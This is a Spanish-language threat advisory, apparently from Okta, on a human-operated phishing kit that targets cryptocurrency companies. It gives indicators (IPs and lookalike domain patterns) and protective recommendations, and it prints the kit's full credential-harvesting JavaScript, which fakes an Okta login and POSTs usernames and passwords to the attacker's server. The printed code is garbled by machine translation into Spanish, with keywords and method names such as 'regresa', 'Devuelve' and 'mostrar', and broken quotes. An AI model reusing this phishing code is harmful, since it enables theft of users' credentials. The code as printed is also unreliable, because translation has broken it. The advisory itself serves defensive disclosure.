Kit de phishing operado por humanos ataca a empresas de criptomonedas

Resumen ejecutivo

En mayo de 2025, el equipo de Okta Threat Intelligence observó un grupo de actividad relacionada con el phishing actualmente no atribuido (O-UNC-020) que se dirige principalmente a Organizations que operan en el espacio de las criptomonedas.

O-UNC-020 se observó por primera vez en octubre de 2024, dirigiéndose a organizaciones que operan en criptomonedas, marketing por correo electrónico, automatización de marketing, automatización de ventas y CRM.

Este aviso detalla las tácticas, técnicas y procedimientos (TTP) observados y proporciona los indicadores de compromiso (IOC) relevantes asociados con esta amenaza activa.

La campaña debería ser de particular interés para cualquier organización que asegure el acceso a aplicaciones basadas en navegador utilizando la contraseña como autenticador principal y las notificaciones push como segundo factor. El kit de phishing utilizado por el atacante, que analizamos a continuación, sirve para capturar y enviar el nombre de usuario y la contraseña de un objetivo a un servidor controlado por el atacante. Al usuario objetivo se le presenta una página diseñada para que parezca que se está cargando contenido adicional, mientras que los operadores humanos del kit de phishing ingresan las credenciales desde su propio navegador para activar una notificación push.

Esta información se proporciona con fines informativos y de inteligencia para permitir a las organizaciones comprender y mitigar los riesgos que plantea esta campaña.

Análisis de Amenazas

El análisis de la campaña de mayo de 2025 identificó la siguiente infraestructura utilizada para alojar las páginas de phishing maliciosas, que presentan un Widget de inicio de sesión de Okta fraudulento:

• 91.212.166[.]185 - AS198953 - Proton66 OOO
• 196.251.84[.]3 - AS401120 - cheapy.host LLC
• 193.24.123[.]162 - AS200593 - PROSPERO OOO

Y utilizaron los siguientes patrones de dominio:

• <customer>-sso.com
• <customer>-okta.com
• login-<customer>.com
• mail-.com<customer>

Actividad de apropiación de cuentas

Tras una vulneración exitosa de las credenciales de usuario, se observó que el o los actores de amenazas intentaban autenticarse desde las siguientes direcciones IP:

• 154.221.58[.]232 - AS202656 - XServerCloud
• 213.209.137[.]210 - AS62240 - Clouvider
• 46.232.37[.]58 - AS62240 - Clouvider

Durante los intentos de autenticación, se observó que el actor de amenazas utilizaba direcciones IP asociadas con Proxyline.net, un importante proveedor ruso de proxy de centro de datos. Este servicio ofrece una extensa red de servidores proxy HTTP y SOCKS IPv4 e IPv6 de alta velocidad, que se pueden utilizar para enrutar el tráfico a través de varias ubicaciones globales. ProxyLine anuncia una política de no registro y acepta pagos con criptomonedas. Estos Artículos destacados lo hacen particularmente atractivo para los ciberdelincuentes, los actores patrocinados por el estado y otras entidades maliciosas que buscan mantener el anonimato y evadir la detección.

Características del kit de phishing

• El kit de phishing presenta un proceso de inicio de sesión de dos pasos: primero solicita un nombre de usuario (ID de entrada usernameInput) y luego, después de una demora simulada, una contraseña (ID de entrada passwordInput).
• El nombre de usuario y la contraseña recopilados, junto con un csrf_token estático (que es parte de la imitación), se envían a través de una solicitud AJAX POST a una ruta relativa api/v1/inicio de sesión en el servidor de phishing.
• Después de ingresar las credenciales, la página simula un retraso en el procesamiento (setTimeout) y luego intenta redirigir al usuario a una página llamada /oauth_await. Esta es otra página controlada por el atacante, diseñada para fomentar la ilusión de que las credenciales primarias del usuario se ingresaron correctamente.
• El código de JavaScript, que se ejecuta directamente en el navegador web del usuario y la redirección a la página oauth_await, indica la recopilación de credenciales en tiempo real por parte de un operador humano. Los atacantes ingresan las credenciales recolectadas en el servicio Okta de producción del objetivo en un intento de activar una notificación push. Un usuario que asume que ingresó la contraseña correcta puede aceptar la notificación push generada por el atacante sin verificar el contexto que se muestra en el mensaje.
• El redirect_uri en la URL generada dinámicamente (<org>.okta.com%2Fenduser%2Fcallback) es legítimo, y el atacante puede intentar redirigir al usuario a través de este enlace después de robar sus credenciales.

<script>

si (!window.location.href.includes('?')) {

function generateRandomString(length) {

const charset = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789';

let result = '';

for (let i = 0; i < length; i++) {

result += charset.charAt(Math.floor(Math.random() * charset.length));

}

Devuelve el resultado;

}

const clientId = sessionStorage.getItem('client_id') || 'okta.' + generateRandomString(32);

sessionStorage.setItem('client_id', clientId);

const codeChallenge = sessionStorage.getItem('code_challenge') || generateRandomString(43);

sessionStorage.setItem('code_challenge', codeChallenge);

const nonce = sessionStorage.getItem('nonce') || generateRandomString(22);

sessionStorage.setItem('nonce', nonce);

const state = sessionStorage.getItem('state') || generateRandomString(40);

sessionStorage.setItem('state', state);

let currentPage = window.location.pathname;

currentPage = currentPage.replace(/\.php$/, '');

const newUrl = `${currentPage}?

client_id=${clientId}&code_challenge=${codeChallenge}&code_challenge_method=S256&nonce=
${nonce}&redirect_uri=

https%3A%2F%2Fredacted.okta.com%2Fenduser%2Fcallback&response_type=
code&state=${state}&scope=openid%20

profile%20email%20okta.users.read.self%20okta.users.manage.self
%20okta.internal.enduser.read%20okta.internal.endus

er.manage%20okta.enduser.panel.read%20okta.enduser.panel.manage
%20okta.myAccount.sesiones.manage`

;

window.location.href = newUrl;

}

$(document).ready(function() {

$('#usernameInput').keyup(function() {

if ($(this).val() == '') {

$(""#inputDispaly"").show();

$("#roleAlertDisplay").show();

} else {

$("#inputDispaly").hide();

}

});

$('#passwordInput').keyup(function() {

if ($(this).val() == '') {

$("#displayPasswordErrorText").mostrar();

$("#passwordContainerError").show();

} else {

$("#displayPasswordErrorText").hide();

}

});

$('#username-saving').on('submit', function(event) {

event.preventDefault();

});

$('#password-saving').on('submit', function(event) {

event.preventDefault();

});

$('#usernameInput').on('keyup', function(event) {

if (event.key === 'Enter' || event.keyCode === 13) {

event.preventDefault();

$('#next_username_button').click();

}

});

$('#passwordInput').on('keyup', function(event) {

if (event.key === 'Enter' || event.keyCode === 13) {

event.preventDefault();

$('#next_pass_button').click();

}

});

$('.password-toggle').on('click', function() {

const $passwordInput = $('#passwordInput');

const $showIcon = $('.button-show');

const $hideIcon = $('.button-hide');

if ($passwordInput.attr('type') === 'contraseña') {

$passwordInput.attr('type', 'text');

$showIcon.hide();

$hideIcon.show();

} else {

$passwordInput.attr('type', 'contraseña');

$showIcon.show();

$("#roleAlertDisplay").hide();

}

});

$('#input36').on('click', function() {

const isChecked = $(this).prop('checked');

if (isChecked) {

$('#input36_check').addClass('checked');

} else {

$('#input36_check').removeClass('checked');

}

});

const loginUsername = $("#next_username_button");

const loginPassword = $(""#next_pass_button");

loginUsername.click(function() {

const username = $('#usernameInput').val();

$("#inputDispaly").hide();

hideIcon.hide();

if (username == '') {

$(""#inputDispaly"").show();

$("#roleAlertDisplay").show();

regresa;

}

loginUsername.attr('disabled', true);

loginUsername.addClass('link-button-disabled btn-disabled');

$("#username-saving").addClass('o-form-saving');

setTimeout( function (){

$(".okta-username-section").hide();

$(".okta-password-section").show();

$(\"#insertUsernameValue\").text(username);

$('#passwordInput').focus();

return

}, 1500);

});

loginPassword.click(function() {

const contraseña = $('#passwordInput').val();

$("#displayPasswordErrorText").hide();

$("#passwordContainerError").hide();

if (contraseña == '') {

$("#displayPasswordErrorText").mostrar();

$("#passwordContainerError").show();

regresa;

}

loginPassword.attr('disabled', true);

loginPassword.addClass('link-botón-disabled btn-disabled');

$("#password-saving").addClass('o-form-saving');

const payload = {

username: $('#usernameInput').val(),

contraseña: $('#passwordInput').val(),

csrf_token: $("input[name=csrf_token]").val(),

página: 'inicio de sesión'

};

$.ajax({

url: 'API/v1/login',

type: 'POST',

datos: carga,

success: function(response) {

setTimeout( function (){

window.location.href = "oauth_await";

return

}, 1500);

},

error: function(err) {

console.log('Error sending data:', err);

alert('Error, por favor actualice la página');

}

});

});

});

</script>

Respuesta ante amenazas

Lo que estamos haciendo
Participamos activamente en las siguientes actividades para mitigar esta amenaza:

• Supervisión continua de dominios de phishing recién registrados e infraestructura asociada con esta campaña.
• Presentar de forma proactiva informes de abuso a los registradores y proveedores de alojamiento pertinentes para iniciar solicitudes de eliminación de los sitios maliciosos identificados.
• Proporcionar orientación y asistencia a las organizaciones para mejorar la seguridad de sus entornos Okta e investigar cualquier actividad sospechosa relacionada con cuentas potencialmente comprometidas.
• Publicando actualizaciones de este aviso a medida que observamos más actividad.

Controles de protección

Recomendaciones para los clientes:

• Inscriba a los usuarios en autenticadores robustos como Okta FastPass, FIDO2 WebAuthn y tarjetas inteligentes, y aplique la resistencia al phishing en la política. Si se hace alguna excepción para las notificaciones Push de Okta Verify, recomendamos aplicar desafíos numéricos para todos los intentos de inicio de sesión o para los intentos de inicio de sesión de alto riesgo.
• Las políticas de autenticación de Okta también se pueden utilizar para restringir el acceso a las cuentas de usuario en función de una variedad de requisitos previos configurables por el cliente. Recomendamos que los administradores restrinjan el acceso a aplicaciones confidenciales a dispositivos que son administrados por herramientas de administración de extremos y protegidos por herramientas de seguridad de extremos. Para acceder a aplicaciones menos confidenciales, exija dispositivos registrados (que utilicen Okta FastPass) que exhiban indicadores de higiene básica.
• Denegar o requerir mayor seguridad para las solicitudes de redes poco utilizadas. Con Okta Network Zones, el acceso puede ser controlado por ubicación, ASN (Número de Sistema Autónomo), IP y Tipo de IP (que puede identificar proxies de anonimización conocidos).
• Las evaluaciones de Okta Behavior y Risk se pueden utilizar para identificar solicitudes de acceso a aplicaciones que se desvían de los patrones de actividad del usuario establecidos previamente. Las políticas se pueden configurar para actualizar a nivel superior o denegar las solicitudes utilizando este contexto.
• Capacite a los usuarios para que identifiquen indicadores de correos electrónicos sospechosos, sitios de phishing y técnicas comunes de ingeniería social utilizadas por los atacantes. Facilite a los usuarios la notificación de posibles problemas mediante la configuración de Notificaciones para el usuario final y elaboración de informes de Actividad Sospechosa.
• Documente, divulgue y cumpla un proceso estandarizado para validar la identidad de los usuarios remotos que se ponen en contacto con el personal de soporte informático, y viceversa.
• Adopte un enfoque de "Privilegios Cero Permanentes" para el acceso administrativo. Asigne a los administradores roles de administrador personalizados con los permisos mínimos necesarios para las tareas diarias, y requiera autorización doble para el acceso JIT (justo a tiempo) a roles más privilegiados.
• Aplique el enlace de sesión IP a todas las aplicaciones administrativas para evitar la repetición de sesiones administrativas robadas.
• Habilite las Acciones Protegidas para forzar la reautenticación cada vez que un usuario administrativo intente realizar acciones confidenciales.

Observación y respuesta a la infraestructura de phishing:

• Revise los registros de aplicaciones (registros de Okta, proxies web, sistemas de correo electrónico, servidores DNS, firewalls) para cualquier evidencia de comunicación con dichos dominios sospechosos.
• Supervise los dominios regularmente para ver si el contenido cambia.
• Si el contenido alojado en el dominio infringe los derechos de autor o las marcas legales, considere proporcionar evidencia y emitir una solicitud de eliminación con el registrador del dominio y/o el proveedor de alojamiento web.

Apéndice A: Indicadores de compromiso

Esta es una investigación en curso, y se pueden identificar IOCs adicionales a medida que evoluciona la campaña. Se aconseja a las organizaciones que permanezcan atentas e implementen las estrategias de mitigación recomendadas. A continuación, se muestran los IOC observados.